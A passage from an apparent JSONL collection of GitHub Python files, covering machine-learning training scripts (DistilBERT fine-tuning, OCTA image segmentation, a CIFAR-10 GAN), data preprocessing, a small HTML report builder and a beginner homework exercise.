self.observation_space = gym.spaces.Box(\n low=0,\n high=1,\n shape=(self.obsGen.feaNum,self.obsGen.feaWidth,\\\n self.obsGen.feaHeight),\n dtype=np.float32,\n )\n \n self.observation_space_value = gym.spaces.Box(\n low=-1,\n high=1,\n shape=(1,),\n dtype=np.float32,\n )\n\n\n\nif __name__ == '__main__':\n value = 0\n stateLi = []\n vLi = []\n a = ScheEnv(0,'train')\n state = a.reset()\n done = False\n while not done:\n v_obs, avai = a.getActionMask()\n act = np.random.choice(avai)\n state, reward, done, info = a.step(act)\n stateLi.append(state)\n vLi.append(v_obs)\n value += reward\n print(info['episode']['r'])\n print(value)\n","repo_name":"tjdx-schedule/AlphaSchedule","sub_path":"ppo_policyV0.040/a2c_ppo_acktr/game/scheEnv.py","file_name":"scheEnv.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"36536996000","text":"# product of list \n# print all the element of the list\ndef product_of_a_list(list):\n product = 1\n indexOfList = 0\n \n while indexOfList < len(list):\n product = product * list[indexOfList]\n indexOfList = indexOfList + 1\n \n return product\n\n\ne = product_of_a_list([2, 2, 3, 4, 5])\nprint(e)\n\ndef elements_of_a_list(list):\n index = 0\n while index < len(list):\n element = list[index]\n print (list[index])\n index = index + 1\n\n\n\nd = elements_of_a_list([7, 10, 1, 2, 3, 4, 5])","repo_name":"NickTheGodOfTime/edabit","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36763090377","text":"sol = True\nl = []\n\nfor i in range(10):\n n = l.append(int(input()))\nx = int(input())\nfor j in l:\n if j%x == 0:\n sol = False\n\nif sol:\n print(\"OK\",end=\"\")\nelse:\n 
print(\"NO\",end=\"\")","repo_name":"Antoo22D/Exercisce_Python_UNIVERSITY","sub_path":"N36.py","file_name":"N36.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31637631718","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ntarget = \"./\"\nraw = pd.read_csv(\"../train.csv\")\n\ntrain, test = train_test_split(raw, train_size=0.8)\ntrain, valid = train_test_split(train, train_size=0.8)\n\ny_train = train['label'].tolist()\nX_train = train.drop('label', axis=1).transpose()\nwith open(f\"{target}train_lab.csv\", \"w\") as f:\n f.writelines([f\"{k}\\t{j}\\n\" for k, j in enumerate(y_train)])\nX_train.to_hdf(f\"{target}train.h5\", key='dge', mode='w', complevel=3)\n\ny_valid = valid['label'].tolist()\nX_valid = valid.drop('label', axis=1).transpose()\nwith open(f\"{target}test_lab.csv\", \"w\") as f:\n f.writelines([f\"{k}\\t{j}\\n\" for k, j in enumerate(y_valid)])\nX_valid.to_hdf(f\"{target}test.h5\", key='dge', mode='w', complevel=3)\n\ny_test = test['label'].tolist()\nX_test = test.drop('label', axis=1).transpose()\nwith open(f\"{target}test/test_lab.csv\", \"w\") as f:\n f.writelines([f\"{k}\\t{j}\\n\" for k, j in enumerate(y_test)])\nX_test.to_hdf(f\"{target}test/test.h5\", key='dge', mode='w', complevel=3)\n","repo_name":"lidh15/vvppcc22","sub_path":"data/test_steps/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25426367917","text":"import time\nimport random\nimport pandas as pd\nfrom glob import glob\nimport argparse\nimport json\nimport subprocess\nimport sys\nimport os\nimport tensorflow as tf\nfrom transformers import DistilBertTokenizer\nfrom transformers import TFDistilBertForSequenceClassification\nfrom transformers import TextClassificationPipeline\nfrom transformers.configuration_distilbert import DistilBertConfig\nimport wandb\nMAX_SEQ_LENGTH = 128\n\nimport optuna\nfrom functools import partial\n\nclass Train():\n def __init__(self):\n self.epochs=3\n self.learning_rate = 0.00001\n self.epsilon = 0.00000001\n self.train_batch_size=128\n self.validation_batch_size=128\n self.test_batch_size=128\n self.train_steps_per_epoch=100\n self.validation_steps=100\n self.test_steps=100\n self.train_instance_count=1\n self.train_instance_type='ml.c5.9xlarge'\n self.train_volume_size=1024\n self.use_xla=True\n self.use_amp=True\n self.freeze_bert_layer=False\n self.enable_sagemaker_debugger=True\n self.enable_checkpointing=False\n self.enable_tensorboard=False\n self.input_mode='Pipe'\n self.run_validation=True\n self.run_test=True\n self.run_sample_predictions = True\n self.train_dataset = None\n self.validation_dataset = None\n self.test_dataset = None\n self.model = None\n self.callbacks = [] \n\n def select_data_and_label_from_record(self,record):\n x = {\n 'input_ids': record['input_ids'],\n 'input_mask': record['input_mask'],\n 'segment_ids': record['segment_ids']\n }\n y = record['label_ids']\n\n return (x, y)\n\n def file_based_input_dataset_builder(self,\n channel,\n input_filenames,\n pipe_mode,\n is_training,\n drop_remainder):\n\n # For training, we want a lot of parallel reading and shuffling.\n # For eval, we want no shuffling and parallel reading doesn't matter.\n\n if pipe_mode:\n print('***** Using pipe_mode with channel {}'.format(channel))\n from sagemaker_tensorflow import 
PipeModeDataset\n dataset = PipeModeDataset(channel=channel,\n record_format='TFRecord')\n else:\n print('***** Using input_filenames {}'.format(input_filenames))\n dataset = tf.data.TFRecordDataset(input_filenames)\n\n dataset = dataset.repeat(100)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\n name_to_features = {\n \"input_ids\": tf.io.FixedLenFeature([MAX_SEQ_LENGTH], tf.int64),\n \"input_mask\": tf.io.FixedLenFeature([MAX_SEQ_LENGTH], tf.int64),\n \"segment_ids\": tf.io.FixedLenFeature([MAX_SEQ_LENGTH], tf.int64),\n \"label_ids\": tf.io.FixedLenFeature([], tf.int64),\n }\n\n def _decode_record(record, name_to_features):\n \"\"\"Decodes a record to a TensorFlow example.\"\"\"\n return tf.io.parse_single_example(record, name_to_features)\n \n dataset = dataset.apply(\n tf.data.experimental.map_and_batch(\n lambda record: _decode_record(record, name_to_features),\n # batch_size=8,\n batch_size=64,\n drop_remainder=drop_remainder,\n num_parallel_calls=tf.data.experimental.AUTOTUNE))\n\n dataset.cache()\n\n if is_training:\n dataset = dataset.shuffle(seed=42,\n buffer_size=10,\n reshuffle_each_iteration=True)\n return dataset\n\n def read_training_data(self, filepath):\n train_data = filepath\n train_data_filenames = glob('{}.tfrecord/*'.format(train_data))\n \n print('train_data_filenames {}'.format(train_data_filenames))\n\n self.train_dataset = self.file_based_input_dataset_builder(\n channel='train',\n input_filenames=train_data_filenames,\n pipe_mode=False,\n is_training=True,\n drop_remainder=False).map(self.select_data_and_label_from_record)\n \n def read_validation_data(self, filepath):\n validation_data = filepath\n validation_data_filenames = glob('{}.tfrecord/*'.format(validation_data))\n print('validation_data_filenames {}'.format(validation_data_filenames))\n\n self.validation_dataset = self.file_based_input_dataset_builder(\n channel='validation',\n input_filenames=validation_data_filenames,\n pipe_mode=False,\n is_training=False,\n drop_remainder=False).map(self.select_data_and_label_from_record)\n \n def read_test_data(self, filepath):\n test_data = filepath\n test_data_filenames = glob('{}.tfrecord/*'.format(test_data))\n print(test_data_filenames)\n self.test_dataset = self.file_based_input_dataset_builder(\n channel='test',\n input_filenames=test_data_filenames,\n pipe_mode=False,\n is_training=False,\n drop_remainder=False).map(self.select_data_and_label_from_record)\n \n def load_pretrained_bert_model(self):\n CLASSES = [1, 2, 3, 4, 5, 6,7]\n \n config = DistilBertConfig.from_pretrained('distilbert-base-uncased',\n num_labels=len(CLASSES))\n \n self.model = TFDistilBertForSequenceClassification.from_pretrained('distilbert-base-uncased', \n config=config)\n\n def setup_custom_classifier_model(self):\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n metric=tf.keras.metrics.SparseCategoricalAccuracy('accuracy')\n\n optimizer=tf.keras.optimizers.Adam(learning_rate=self.learning_rate, epsilon=self.epsilon)\n self.model.compile(optimizer=optimizer, loss=loss, metrics=[metric])\n self.model.layers[0].trainable=not self.freeze_bert_layer\n self.model.summary()\n\n log_dir = './tmp/tensorboard/'\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\n \n self.callbacks.append(tensorboard_callback)\n\n history = self.model.fit(self.train_dataset,\n shuffle=True,\n epochs=self.epochs,\n steps_per_epoch=self.train_steps_per_epoch,\n validation_data=self.validation_dataset,\n validation_steps=self.validation_steps,\n 
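# --- Added note (hedged), on file_based_input_dataset_builder above:
# tf.data transformations return new datasets rather than mutating in
# place, so the bare `dataset.cache()` call discards its result and nothing
# is actually cached. The likely intended line is:
#     dataset = dataset.cache()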
callbacks=self.callbacks,\n batch_size=1)\n\n def evaluate_model(self):\n test_history = self.model.evaluate(self.test_dataset,\n steps=self.test_steps, \n callbacks=self.callbacks)\n print(\"model evaluation: {}\".format(test_history))\n \n def save_model(self, filename):\n model_dir = './tmp/'\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n filepath = model_dir + filename\n self.model.save_pretrained(filepath)\n \n def init_sweep(self):\n sweep_config = {\n \"name\": \"vanilla-sweep-batch-16\",\n \"method\": \"bayes\",\n \"metric\": {\"name\": \"accuracy\", \"goal\": \"maximize\"},\n \"parameters\": {\n \"num_train_epochs\": {\"min\": 1, \"max\": 10},\n \"learning_rate\": {\"min\": 0, \"max\": 4e-4},\n },\n \"early_terminate\": {\"type\": \"hyperband\", \"min_iter\": 60}\n }\n hyperparameter_defaults = dict(\n shuffle=True,\n epochs=self.epochs,\n steps_per_epoch=self.train_steps_per_epoch,\n validation_data=self.validation_dataset,\n validation_steps=self.validation_steps,\n callbacks=self.callbacks,\n batch_size=1\n )\n wandb.init(project=\"bert-opt\", sync_tensorboard=True,config=hyperparameter_defaults)\n \n def optimize(self,trial):\n\n epochs = trial.suggest_int(\"epochs\",1,3)\n steps_per_epoch=trial.suggest_int(\"steps_per_epoch\",10,100)\n validation_steps=trial.suggest_int(\"validation_steps\",10,100)\n\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n metric=tf.keras.metrics.SparseCategoricalAccuracy('accuracy')\n\n optimizer=tf.keras.optimizers.Adam(learning_rate=self.learning_rate, epsilon=self.epsilon)\n self.model.compile(optimizer=optimizer, loss=loss, metrics=[metric])\n self.model.layers[0].trainable=not self.freeze_bert_layer\n self.model.summary()\n\n log_dir = './tmp/tensorboard/'\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\n \n self.callbacks.append(tensorboard_callback)\n print(\"[debug] fit model...................................\")\n history = self.model.fit(self.train_dataset,\n shuffle=True,\n epochs=epochs,\n steps_per_epoch=steps_per_epoch,\n validation_data=self.validation_dataset,\n validation_steps=validation_steps,\n # callbacks=self.callbacks,\n batch_size=None,\n verbose=2)\n \n self.evaluate_model()\n\ndef main():\n train = Train()\n train.read_training_data('output_train_data')\n train.read_validation_data('output_validation_data')\n train.read_test_data('output_test_data')\n train.load_pretrained_bert_model()\n\n optimization_function = partial(train.optimize)\n study = optuna.create_study(direction=\"minimize\")\n study.optimize(optimization_function, n_trials=15)\n # train.setup_custom_classifier_model()\n # train.evaluate_model()\n train.save_model(\"model\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"ianovski/google-play-store-nlp","sub_path":"src/local_run/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"29864668854","text":"from json2html import json2html\nimport config as cfg\n\n\ndef clean_html():\n with open(cfg.html_output, 'w') as newpull:\n newpull.write(\"\")\n newpull.write('')\n newpull.write(\"\")\n newpull.write('')\n newpull.write(\" Find Da Job\")\n newpull.write(\"\")\n newpull.write(\"\")\n newpull.close()\n\n\ndef html_builder(result_write, placement):\n with open(cfg.html_output, 'a') as myFile:\n if placement == \"text\":\n myFile.write(\"Apply Here: \")\n 
myFile.write(json2html.convert(result_write).encode('ascii', 'ignore').decode('ascii'))\n            myFile.write('<br>')\n            myFile.close()\n        elif placement == \"html\":\n            try:\n                myFile.write(result_write)\n                myFile.write('<br>')\n                myFile.close()\n            except:\n                myFile.write(json2html.convert(result_write).encode('ascii', 'ignore').decode('ascii'))\n                myFile.write('<br>')\n                myFile.close()\n        elif placement == \"nltk\":\n            myFile.write(\"Most Common Words: \")\n            myFile.write(json2html.convert(result_write).encode('ascii', 'ignore').decode('ascii'))\n            myFile.write('<br>')\n            myFile.write('<br>')\n            myFile.close()\n        elif placement == \"resume\":\n            myFile.write(\"<center><h2>Current Resume Keywords</h2></center>\")\n            myFile.write(result_write)\n            myFile.write('<br>')\n            myFile.close()\n        else:\n            print(\"Using Default placement\")\n            myFile.write(\"<center><h2>Current Resume Keywords</h2></center>\")\n            myFile.write(result_write)\n            myFile.write('<br>
')\n myFile.close()\n\n\ndef close_html():\n with open(cfg.html_output, 'a') as newpull:\n newpull.write(\"\")\n newpull.write(\"\")\n newpull.close()\n","repo_name":"Zeerg/jobsearch","sub_path":"modules/html_builder.py","file_name":"html_builder.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"26091322381","text":"from settings_args import *\nimport torch.nn.functional as F\nfrom torch.backends import cudnn\nfrom utils import utils\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn as nn\nimport torchvision\nfrom torch.optim.lr_scheduler import CosineAnnealingLR\nfrom torch.utils.tensorboard import SummaryWriter\nimport os\nfrom utils.loss import DiceLoss\nfrom tqdm import tqdm\nimport csv\nimport random\nimport numpy as np\nfrom PIL import Image\nimport time\nimport torchsummary\nfrom torchvision.utils import save_image, make_grid\nfrom DNN_printer import DNN_printer\nfrom model.OCT2Former import OCT2Former\nimport sys\n\nsys.setrecursionlimit(100000)\n\ndef main(args, num_fold=0):\n torch.set_num_threads(1)\n model = OCT2Former(in_chans=args.in_channel, num_classes=args.n_class,\n embed_dims=args.vit_dims, k=args.token_dim,\n num_heads=[2, 4, 4, 8, 16], mlp_ratios=[4, 4, 4, 4, 4], \n depths=args.depths, aux=args.aux, spec_inter=args.spec_interpolation)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model.to(device)\n\n if args.mode == \"train\":\n train(model, device, args, num_fold=num_fold)\n\n elif args.mode == \"test\":\n return test(model, device, args, num_fold=num_fold)\n\n else:\n raise NotImplementedError\n\n\n\n\ndef train(model, device, args, num_fold=0):\n dataset_train = myDataset(args.data_root, args.target_root, args.crop_size, \"train\",\n k_fold=args.k_fold, imagefile_csv=args.dataset_file_list, num_fold=num_fold, data_root_aux=args.data_root_aux, img_aug=args.img_aug)\n dataloader_train = DataLoader(dataset_train, batch_size=args.batch_size, shuffle=True,\n num_workers=args.num_workers, pin_memory=True, drop_last=True) \n num_train_data = len(dataset_train)\n dataset_val = myDataset(args.data_root, args.target_root, args.crop_size, \"val\",\n k_fold=args.k_fold, imagefile_csv=args.dataset_file_list, num_fold=num_fold, data_root_aux=args.data_root_aux)\n dataloader_val = DataLoader(dataset_val, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=True, drop_last=True) \n num_train_val = len(dataset_val) \n ####################################################################################################################\n writer = SummaryWriter(log_dir=args.log_dir[num_fold], comment=f'tb_log')\n\n opt = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n\n criterion = nn.CrossEntropyLoss(torch.tensor(args.class_weight, device=device))\n criterion_dice = DiceLoss()\n\n cp_manager = utils.save_checkpoint_manager(5) \n step = 0\n\n for epoch in range(args.num_epochs):\n model.train()\n lr = utils.poly_learning_rate(args, opt, epoch) \n lr = opt.param_groups[-1]['lr']\n with tqdm(total=num_train_data, desc=f'[Train] fold[{num_fold}/{args.k_fold}] Epoch[{epoch + 1}/{args.num_epochs} LR={lr:.8f}] ', unit='img') as pbar:\n for batch in dataloader_train:\n step += 1\n image = batch[\"image\"]\n label = batch[\"label\"]\n assert len(image.size()) == 4\n assert len(label.size()) == 3\n\n image = image.to(device, dtype=torch.float32)\n label = 
label.to(device, dtype=torch.long)\n\n opt.zero_grad()\n \n outputs = model(image)\n main_out = outputs[\"main_out\"]\n\n diceloss = criterion_dice(main_out, label)\n celoss = criterion(main_out, label)\n totall_loss = celoss\n\n if \"aux_out\" in outputs.keys():\n aux_losses = 0\n for aux in outputs[\"aux_out\"]:\n label_aux = label\n auxloss = (criterion_dice(aux, label)) * args.aux_weight \n totall_loss += auxloss\n aux_losses += auxloss\n\n totall_loss.backward()\n opt.step()\n\n if step % 5 == 0:\n if args.aux:\n writer.add_scalar(\"Train/aux_losses\",aux_losses, step)\n writer.add_scalar(\"Train/Totall_loss\", totall_loss.item(), step)\n writer.add_scalar(\"Train/lr\", lr, step)\n\n pbar.set_postfix(**{'loss': totall_loss.item()}) \n pbar.update(args.batch_size)\n \n if (epoch+1) % args.val_step == 0:\n mDice, mIoU, mAcc, mSensitivity, mSpecificity, mAuc, mBACC = val(model, dataloader_val, num_train_val, device, args)\n writer.add_scalar(\"Valid/Dice_val\", mDice, step)\n writer.add_scalar(\"Valid/IoU_val\", mIoU, step)\n writer.add_scalar(\"Valid/Acc_val\", mAcc, step)\n writer.add_scalar(\"Valid/Auc_val\", mAuc, step)\n writer.add_scalar(\"Valid/Sen_val\", mSensitivity, step)\n writer.add_scalar(\"Valid/Spe_val\", mSpecificity, step)\n writer.add_scalar(\"Valid/bacc_val\", mBACC, step)\n val_result = [num_fold, epoch+1, mDice, mIoU, mAcc, mAuc, mSensitivity, mSpecificity, mBACC]\n with open(args.val_result_file, \"a\") as f:\n w = csv.writer(f)\n w.writerow(val_result)\n cp_manager.save(model, opt, os.path.join(args.checkpoint_dir[num_fold], f'CP_epoch{epoch + 1}.pth'), float(mDice))\n\n\ndef val(model, dataloader, num_train_val, device, args):\n all_dice = []\n all_iou = []\n all_acc = []\n all_auc = []\n all_sen = []\n all_spe = []\n all_bacc = []\n model.eval()\n with torch.no_grad():\n with tqdm(total=num_train_val, desc=f'VAL', unit='img') as pbar:\n for batch in dataloader:\n image = batch[\"image\"]\n label = batch[\"label\"]\n file = batch[\"file\"]\n assert len(image.size()) == 4\n assert len(label.size()) == 3\n image = image.to(device, dtype=torch.float32)\n label = label.to(device, dtype=torch.long)\n outputs = model(image)\n main_out = outputs[\"main_out\"]\n main_out = torch.exp(main_out).max(dim=1)[1] \n\n for b in range(image.size()[0]):\n file_name, _ = os.path.splitext(file[b])\n hist = utils.fast_hist(label[b, :, :], main_out[b, :, :], args.n_class)\n dice, iou, acc, Sensitivity, Specificity, BACC = utils.cal_scores(hist.cpu().numpy())\n auc = utils.calc_auc(main_out[b, :, :], label[b, :, :])\n all_dice.append(list(dice))\n all_iou.append(list(iou))\n all_acc.append([acc])\n all_auc.append([auc])\n all_sen.append(list(Sensitivity))\n all_spe.append(list(Specificity))\n all_bacc.append(list(BACC))\n pbar.update(image.size()[0])\n mDice = np.array(all_dice).mean()\n mIoU = np.array(all_iou).mean()\n mAcc = np.array(all_acc).mean()\n mAuc = np.array(all_auc).mean()\n mSensitivity = np.array(all_sen).mean()\n mSpecificity = np.array(all_spe).mean()\n mBACC = np.array(all_bacc).mean()\n \n print(f'\\r [VAL] mDice:{mDice:0.2f}, mIoU:{mIoU:0.2f}, mAcc:{mAcc:0.2f}, mAuc:{mAuc:0.2f}, mSen:{mSensitivity:0.2f}, mSpec:{mSpecificity:0.2f}, mBACC:{mBACC:0.2f}')\n\n return mDice, mIoU, mAcc, mSensitivity, mSpecificity, mAuc, mBACC\n\n\n\ndef test(model, device, args, num_fold=0):\n if os.path.exists(args.val_result_file):\n with open(args.val_result_file, \"r\") as f:\n reader = csv.reader(f)\n val_result = list(reader)\n best_epoch = utils.best_model_in_fold(val_result, 
num_fold)\n else:\n best_epoch = args.num_epochs\n model_dir = os.path.join(args.checkpoint_dir[num_fold], f'CP_epoch{best_epoch}.pth')\n model.load_state_dict(torch.load(model_dir, map_location=device)[\"state_dict\"])\n print(f'\\rtest model loaded: [fold:{num_fold}] [best_epoch:{best_epoch}]')\n\n dataset_test = myDataset(args.data_root, args.target_root, args.crop_size, \"test\",\n k_fold=args.k_fold, imagefile_csv=args.dataset_file_list, num_fold=num_fold,data_root_aux=args.data_root_aux,)\n dataloader = DataLoader(dataset_test, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers, pin_memory=True)\n\n all_dice = []\n all_iou = []\n all_acc = []\n all_auc = []\n all_sen = []\n all_spe = []\n all_bacc = []\n model.eval()\n with torch.no_grad():\n with tqdm(total=len(dataset_test), desc=f'TEST fold {num_fold}/{args.k_fold}', unit='img') as pbar:\n for batch in dataloader:\n image = batch[\"image\"]\n label = batch[\"label\"]\n file = batch[\"file\"]\n assert len(image.size()) == 4\n assert len(label.size()) == 3\n image = image.to(device, dtype=torch.float32)\n label = label.to(device, dtype=torch.long)\n\n outputs = model(image)\n pred = outputs[\"main_out\"]\n\n if args.tt_aug:\n for i, axis in enumerate([[2], [3], [2, 3]]):\n image_tmp = torch.flip(image, dims=axis)\n pred_tmp = model(image_tmp)[\"main_out\"]\n pred_tmp = torch.flip(pred_tmp, dims=axis)\n pred += pred_tmp\n pred = pred / 4\n\n pred = torch.exp(pred).max(dim=1)[1]\n\n for b in range(image.size()[0]):\n hist = utils.fast_hist(label[b,:,:], pred[b,:,:], args.n_class)\n dice, iou, acc, Sensitivity, Specificity, bacc = utils.cal_scores(hist.cpu().numpy(), smooth=0.01)\n auc = utils.calc_auc(pred[b, :, :], label[b, :, :])\n\n test_result = [file[b], dice.mean()]+list(dice)+[iou.mean()]+list(iou)+[acc] + \\\n [Sensitivity.mean()]+list(Sensitivity)+[Specificity.mean()]+list(Specificity)+ \\\n [bacc.mean()]+list(bacc)\n with open(args.test_result_file, \"a\") as f:\n w = csv.writer(f)\n w.writerow(test_result)\n\n all_dice.append(list(dice))\n all_iou.append(list(iou))\n all_acc.append([acc])\n all_auc.append([auc])\n all_sen.append(list(Sensitivity))\n all_spe.append(list(Specificity))\n all_bacc.append(list(bacc))\n if args.plot:\n file_name, _ = os.path.splitext(file[b])\n save_image(pred[b,:,:].cpu().float().unsqueeze(0), os.path.join(args.plot_save_dir, file_name + f\"_pred_{dice.mean():.2f}.png\"), normalize=True)\n\n pbar.update(image.size()[0])\n\n print(f\"\\r---------Fold {num_fold} Test Result---------\")\n print(f'mDice: {np.array(all_dice).mean()}')\n print(f'mIoU: {np.array(all_iou).mean()}')\n print(f'mAcc: {np.array(all_acc).mean()}')\n print(f'mAuc: {np.array(all_auc).mean()}')\n print(f'mSens: {np.array(all_sen).mean()}')\n print(f'mSpec: {np.array(all_spe).mean()}')\n print(f'mBACC: {np.array(all_bacc).mean()}')\n\n if num_fold == 0:\n utils.save_print_score(all_dice, all_iou, all_acc, all_auc, all_sen, all_spe, all_bacc, args.test_result_file, args.label_names)\n return\n\n return all_dice, all_iou, all_acc, all_auc, all_sen, all_spe, all_bacc\n\n\n\nif __name__ == \"__main__\":\n\n seed = 12345\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)####\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.cuda.empty_cache()\n cudnn.benchmark = True\n\n args = basic_setting()\n assert args.k_fold != 1\n os.environ['CUDA_VISIBLE_DEVICES'] = args.cuda_id\n\n if (not os.path.exists(args.dataset_file_list)) and (args.k_fold is not None):\n 
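# Assumption: utils.get_dataset_filelist scans data_root and writes the
        # k-fold image list to args.dataset_file_list, so the same split is
        # generated once and reused on every subsequent run.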
utils.get_dataset_filelist(args.data_root, args.dataset_file_list)\n\n    if args.dataset == 'OCTA-3M':\n        from dataset.dataset_3M import *\n    elif args.dataset == 'OCTA-6M':\n        from dataset.dataset_6M import *\n    elif args.dataset == 'ROSE':\n        from dataset.dataset_ROSE import *\n    elif args.dataset == 'OCTA-SS':\n        from dataset.dataset_SS import *\n    else:\n        print(\"dataset is not chosen\")\n\n    mode = args.mode\n    if args.k_fold is None:\n        print(\"k_fold is None\")\n        if mode == \"train_test\":\n            args.mode = \"train\"\n            print(\"###################### Train Start & \" + args.network + \" ######################\")\n            main(args)\n            args.mode = \"test\"\n            print(\"###################### Test Start & \" + args.network + \" ######################\")\n            main(args)\n        else:\n            main(args)\n    else:\n        if mode == \"train_test\":\n            print(\"###################### Train & Test Start & \"+ args.network + \" ######################\")\n\n        if mode == \"train\" or mode == \"train_test\":\n            args.mode = \"train\"\n            print(\"###################### Train Start & \" + args.network + \" ######################\")\n            for i in range(args.start_fold, args.end_fold):\n                torch.cuda.empty_cache()\n                main(args, num_fold=i + 1)\n\n        if mode == \"test\" or mode == \"train_test\":\n            args.mode = \"test\"\n            print(\"###################### Test Start & \" + args.network + \" ######################\")\n            all_dice = []\n            all_iou = []\n            all_acc = []\n            all_auc = []\n            all_sen = []\n            all_spe = []\n            all_bacc = []\n            for i in range(args.start_fold, args.end_fold):\n                Dice, IoU, Acc, Auc, Sensitivity, Specificity, BACC = main(args, num_fold=i + 1)\n                all_dice += Dice\n                all_iou += IoU\n                all_acc += Acc\n                all_auc += Auc\n                all_sen += Sensitivity\n                all_spe += Specificity\n                all_bacc += BACC\n            utils.save_print_score(all_dice, all_iou, all_acc, all_auc, all_sen, all_spe, all_bacc, args.test_result_file, args.label_names)\n\n\n\n\n\n\n\n","repo_name":"coreeey/OCT2Former","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14345,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"43"} +{"seq_id":"72019979329","text":"#### CIFAR_10 ResNet GB-GAN\n\n## Main changes: 1.optimize input pool\n##               2.loss func built-in\n\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'\n\nimport argparse\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport torch.autograd as autograd\n\nfrom network import Discriminator_Res, Generator, weights_init_normal, weights_init_xavier, weights_init_kaiming\nfrom models.resnet import * \nfrom utils import img_truncate, PoolSet, inception_score\n#from util import plot_scatter, plot_scatter_label, weights_init, compute_acc\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--z_dim', type=int, default=100, help='size of the latent z vector')\nparser.add_argument('--num_epoch', type=int, default=1000, help='number of epochs to train for')\nparser.add_argument('--G_batch_size', type=int, default=128) #?\nparser.add_argument('--pool_size_t', type=int, default=10)\n\nparser.add_argument('--lr_d', type=float, default=0.001, help='learning rate discriminator, default=0.0002')\nparser.add_argument('--eta', type=float, default=.01, help='Update rate for each period') #?default reasonable?\nparser.add_argument('--lr_g', type=float, default=0.01, help='learning rate generator, default=0.0002')\nparser.add_argument('--dsteps', type=int, 
default=1, help='Num of steps of Discriminator for one step Generator')\nparser.add_argument('--G_optimizer', type=str, default='Adam', help='Adam or SGD')\nparser.add_argument('--batch_size', type=int, default=100, help='input batch size')\nparser.add_argument('--init', type=str, default='xavier', help='xavier, kaiming or normal')\n\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--period', type=int, default=20)\nparser.add_argument('--G_epoch', type=int, default=10, help='number of epochs to train for') #default?\n\nparser.add_argument('--workers', type=int, default=4, help='number of data loading workers')\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\nparser.add_argument('--disc', type=str, default='Res', help='DC or Res')\nparser.add_argument('--exp', type=str, default='001')\n#parser.add_argument('--manualSeed', type=int, help='manual seed')\n\nopt = parser.parse_args()\nprint(opt)\n\n# specify the gpu id if using only 1 gpu\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\ntry:\n    os.mkdir('./exp')\nexcept:\n    pass\n\ntry:\n    os.mkdir('./exp/' + opt.exp)\n    os.mkdir('./exp/' + opt.exp + '/results')\n    os.mkdir('./exp/' + opt.exp + '/results/fix')\n    os.mkdir('./exp/' + opt.exp + '/results/random')\nexcept:\n    pass\n\n\ntry:\n    os.mkdir('./exp/' + opt.exp + '/results/loss_monitor')\nexcept:\n    pass\n\nwith open('./exp/' + opt.exp + '/loss.txt', 'a') as inFile:\n    print(opt, file=inFile)\n\n# dataset CIFAR10\ndataset = datasets.CIFAR10(\n    root='./data', download=True,\n    transform=transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), # --> [-1, 1]\n    ]))\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batch_size,\n                                         shuffle=True)\n\n\nif opt.init == 'xavier':\n    weights_init_ = weights_init_xavier\nelif opt.init == 'kaiming':\n    weights_init_ = weights_init_kaiming\nelif opt.init == 'normal':\n    weights_init_ = weights_init_normal\nelse:\n    raise NameError('Wrong Initialization')\n\nnetG = Generator(z_dim=opt.z_dim)\nnetG.apply(weights_init_)\nnetG.to(device)\n\nif opt.disc == 'Res':\n    netD = Discriminator_Res()\nelif opt.disc == 'DC':\n    netD = Discriminator_DC()\nelse:\n    raise NameError('Wrong Discriminator')\nnetD.apply(weights_init_)\nnetD.to(device)\n\n## Resuming Models\nif opt.resume:\n    # Load checkpoint.\n    print('==> Resuming from checkpoint..')\n    assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'\n    state = torch.load('./checkpoint/cifar_exp_' + opt.exp +'.t7')\n    netG.load_state_dict(state['netG'])\n    netD.load_state_dict(state['netD'])\n    start_epoch = state['epoch'] + 1\n    is_score = state['is_score']\n    best_is = state['best_is']\n    loss_G = 